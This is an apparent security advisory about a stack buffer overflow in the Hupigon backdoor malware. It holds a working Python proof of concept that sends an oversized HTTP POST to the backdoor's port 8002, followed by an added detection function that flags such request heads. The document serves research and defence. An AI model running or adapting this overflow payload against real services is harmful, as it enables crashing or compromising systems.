Backdoor.Win32.Hupigon.adef Remote Stack Buffer Overflow

Backdoor.Win32.Hupigon.adef malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=8002

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PBARBAR="POST /"+"A"*4198+"HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+"A"*4198

    # socket.send() requires bytes on Python 3
    s.send(PBARBAR.encode())
    s.close()

    print("Backdoor.Win32.Hupigon.adef / Remote Stack Buffer Overflow")
    print("MD5: c8f55ce7bbec784a97d7bfc6d7b1931f")
    print("By Malvuln")

if __name__=="__main__":
    doit()
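
Detection sketch (added example, not part of the original advisory or the PoC author's code): a check that a proxy or network sensor could run on TCP payloads seen on port 8002 to flag request heads shaped like the PoC above. The function name, finding labels and both length thresholds are assumptions chosen for illustration, and the sample payloads are constructed.

```python
# Assumed ceilings for illustration; the advisory does not state the buffer size.
MAX_TARGET_LEN = 2048        # request target (path) length
MAX_HEADER_VALUE_LEN = 256   # single header value length


def inspect_request_head(data):
    """Return a list of findings for the HTTP request head in a raw payload."""
    findings = []
    head = data.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    target = parts[1] if len(parts) > 1 else b""

    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized-request-target")
    # A well-formed request line is: METHOD SP target SP HTTP/x.y
    if len(parts) != 3 or not parts[-1].startswith(b"HTTP/"):
        findings.append("malformed-request-line")

    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        name = name.strip().lower()
        value = value.strip()
        if len(value) > MAX_HEADER_VALUE_LEN:
            findings.append("oversized-header:" + name.decode("latin-1"))
        if name == b"content-length" and not value.isdigit():
            findings.append("non-numeric-content-length")
    return findings


# Constructed sample with the same shape as the PoC request.
SUSPECT = (b"POST /" + b"A" * 4198 + b"HTTP/1.1\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\n"
           b"Content-Length: " + b"A" * 4198)

# Constructed benign request for comparison.
BENIGN = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 9\r\n\r\nuser=test")

if __name__ == "__main__":
    print(inspect_request_head(SUSPECT))
    print(inspect_request_head(BENIGN))
```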